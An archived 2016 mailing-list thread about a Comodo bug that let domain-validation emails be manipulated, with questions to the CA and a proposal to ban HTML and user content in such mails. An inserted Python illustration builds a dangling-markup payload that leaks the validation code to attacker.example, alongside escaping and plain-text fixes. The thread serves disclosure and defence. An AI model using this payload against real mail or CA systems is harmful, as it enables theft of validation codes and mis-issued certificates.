Re: Server certificate domain validation bug

2016-07-29 Thread yuhongbao_386
On Friday, July 29, 2016 at 2:24:43 PM UTC-7, Hanno Böck wrote:
> Hi,
> 
> I just saw this report and my initial reaction was that it seems to be
> a grave security risk to use HTML emails with user controlled content
> for email domain validation.
> 
> I don't see any need for this and would strongly recommend that a
> policy forbidding that practice gets implemented. The alternative would
> be carefully preventing XSS issues, but honestly, XSS is complicated
> and subtle, I don't see it as realistic to prevent all XSS issues.
> 
> The domain validation process is one of the most security sensitive
> pieces of the CA ecosystem, therefore I recommend that:
> * Domain validation mails must not use HTML and must not contain any
>   user-controlled content.
> 
> -- 
> Hanno Böck
> https://hboeck.de/
> 
> mail/jabber: ha...@hboeck.de
> GPG: BBB51E42

It is not "XSS" BTW when emails don't use JavaScript.
___
dev-security-policy mailing list
dev-security-policy@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security-policy


Re: Server certificate domain validation bug

2016-07-29 Thread Nick Lamb
Hi Robin,

On Friday, 29 July 2016 18:54:56 UTC+1, Robin Alden wrote:
> We received a report of bugs in the construction of the emails we send out
> in order to confirm authorization by the domain name registrant prior to
> issuing a server certificate.
> 
> Colloquially these are known as Domain-Control Validation Emails.

Indeed. A few questions arise. First about this specific occurrence, all 
questions are about the state prior to the incident. It's interesting to hear 
about things which have changed, but my focus at first is on how things were 
_before_ you knew about this specific problem.

1. Did Comodo grasp that these emails were a critical element of their CA 
systems? e.g. do you have a document that calls them out as being important in 
this way and distinguishes them from marketing communications and other "fluff" 
that, though it may be important to your business, is not vital to the web PKI?

2. Was it impressed upon the software engineers responsible for Comodo's 
software which sends these emails how critical this content was? Were they 
given suitable training e.g. based on OWASP in how to make the software secure 
against well-known risks like this?

3. Had Comodo engaged a third party to conduct penetration testing of their web 
site (https://secure.comodo.com/)? If so, did that engagement include these 
emails as part of the system to be tested? How often was this testing done?

4. How long had this bug been present in your production systems, and to what 
certainty do you know this answer?

> https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-ssl-certificates-from-comodo-via-dangling-markup-injection/index.html

Thanks for the link.

> We are pleased to report that no certificates were issued contrary to the
> terms of our CPS.

Two more, this time from the point of view of Comodo after the problem was 
reported:

5. What methods were actually used to determine whether any certificates had 
been issued contrary to the terms? Were those methods independent of the 
specific technique used in this incident, or did they assume that this method 
was the only possible means by which certificates might be mis-issued by Comodo 
at this time?

6. Given the timeline established in question 4, were you able to perform such 
checks for the whole period affected, or only some of it?

> We will be further engaging with external security consultants to ensure
> that our systems remain secure so that we may continue to meet our policy
> obligations.

Now a final question from the point of view of the incident having happened, 
but independent of Comodo itself:

7. In your view what new requirements should be imposed on CAs by CA/B or by 
the individual trust stores in order to reduce the risk of this sort of 
incident in future, whether at Comodo or another CA?


Re: Server certificate domain validation bug

2016-07-29 Thread Hanno Böck
Hi,

I just saw this report and my initial reaction was that it seems to be
a grave security risk to use HTML emails with user controlled content
for email domain validation.

I don't see any need for this and would strongly recommend that a
policy forbidding that practice gets implemented. The alternative would
be carefully preventing XSS issues, but honestly, XSS is complicated
and subtle, I don't see it as realistic to prevent all XSS issues.

The domain validation process is one of the most security sensitive
pieces of the CA ecosystem, therefore I recommend that:
* Domain validation mails must not use HTML and must not contain any
  user-controlled content.

-- 
Hanno Böck
https://hboeck.de/

mail/jabber: ha...@hboeck.de
GPG: BBB51E42


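The injection Hanno is warning about, as an added illustration that is not code from this thread, from Comodo, or from the linked blog post: a hypothetical HTML validation-mail template interpolates one applicant-controlled field (an organisation name) without escaping, and an applicant who submits an `<img>` tag whose `src="` attribute is never closed makes the recipient's HTML engine treat everything up to the next quote, validation code included, as the image URL and fetch it from the attacker's host. The template, the field name, the validation code and the attacker host are all constructed for the example. The block also shows the two responses discussed in the thread: escaping the field (the "prevent XSS" route) and dropping HTML and applicant-controlled content from the mail altogether.

```python
"""Dangling-markup injection into an HTML domain-validation email.

Illustrative code added for this thread, not Comodo's software. The
template, the 'organisation' field, the validation code and the attacker
host are constructed assumptions; the mechanism is the general one.
"""
import html
from html.parser import HTMLParser

# Constructed sample data.
VALIDATION_CODE = "A7F3-D21C-9E04"
ATTACKER_HOST = "https://attacker.example/collect?leak="

# What the applicant types into the 'organisation' field: an <img> tag whose
# src attribute is opened but never closed (the "dangling" markup).
MALICIOUS_ORG = '<img src="' + ATTACKER_HOST

# Hypothetical HTML DCV template that interpolates the applicant-supplied
# organisation name into the mail body.
HTML_TEMPLATE = (
    "<html><body>"
    "<p>Dear {org},</p>"
    "<p>A certificate was requested for your domain. "
    "Your validation code is <b>{code}</b>.</p>"
    '<p><a href="https://ca.example/dcv?code={code}">Approve</a></p>'
    "</body></html>"
)


def render_vulnerable(org: str, code: str) -> str:
    """Interpolates the raw applicant string: the vulnerable construction."""
    return HTML_TEMPLATE.format(org=org, code=code)


def render_escaped(org: str, code: str) -> str:
    """Same HTML template, applicant field HTML-escaped (quotes included)."""
    return HTML_TEMPLATE.format(org=html.escape(org, quote=True), code=code)


# text/plain and no applicant-controlled field at all: the recommendation
# made in the thread removes the whole class of problem.
TEXT_TEMPLATE = (
    "A certificate was requested for a domain you control.\n"
    "If you approve, enter this validation code on the CA's website:\n"
    "{code}\n"
)


def render_plaintext(code: str) -> str:
    """Plain-text mail carrying only CA-generated content."""
    return TEXT_TEMPLATE.format(code=code)


class ImgSrcCollector(HTMLParser):
    """Collects <img src=...> values the way a mail client's HTML engine would:
    a double-quoted attribute value runs until the next double quote."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value is not None:
                    self.srcs.append(value)


def image_urls(document: str) -> list:
    """Return every URL a rendering mail client would fetch for an <img>."""
    parser = ImgSrcCollector()
    parser.feed(document)
    parser.close()
    return parser.srcs


def leaks_code(document: str, code: str) -> bool:
    """True if the validation code would be sent to the attacker's host."""
    return any(url.startswith(ATTACKER_HOST) and code in url
               for url in image_urls(document))


if __name__ == "__main__":
    vuln = render_vulnerable(MALICIOUS_ORG, VALIDATION_CODE)
    print("vulnerable image URLs:", image_urls(vuln))
    print("escaped image URLs   :", image_urls(render_escaped(MALICIOUS_ORG, VALIDATION_CODE)))
    print("plain-text mail      :", render_plaintext(VALIDATION_CODE))
```

Running it, the vulnerable rendering yields a single image URL that begins with the attacker's host and contains the rest of the mail body, validation code and approval link included, which the client fetches as soon as it displays the message. Escaping the field produces no image tag at all, but only if every interpolation point in every template is escaped correctly, which is the maintenance burden the thread is arguing against; the plain-text rendering has no markup to get wrong and nothing the applicant wrote in it.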


Server certificate domain validation bug

2016-07-29 Thread Robin Alden
We received a report of bugs in the construction of the emails we send out
in order to confirm authorization by the domain name registrant prior to
issuing a server certificate.

Colloquially these are known as Domain-Control Validation Emails.

The security researcher, Matthew Bryant, followed a responsible disclosure
process and we were afforded the opportunity to resolve this bug before he
published his blog post at 

https://thehackerblog.com/keeping-positive-obtaining-arbitrary-wildcard-ssl-certificates-from-comodo-via-dangling-markup-injection/index.html

We are pleased to report that no certificates were issued contrary to the
terms of our CPS.

We have informed our external WebTrust auditors of the report and of its
resolution.

We will be further engaging with external security consultants to ensure
that our systems remain secure so that we may continue to meet our policy
obligations.

Regards

Robin Alden

Comodo

This email has also been posted to pub...@cabforum.org
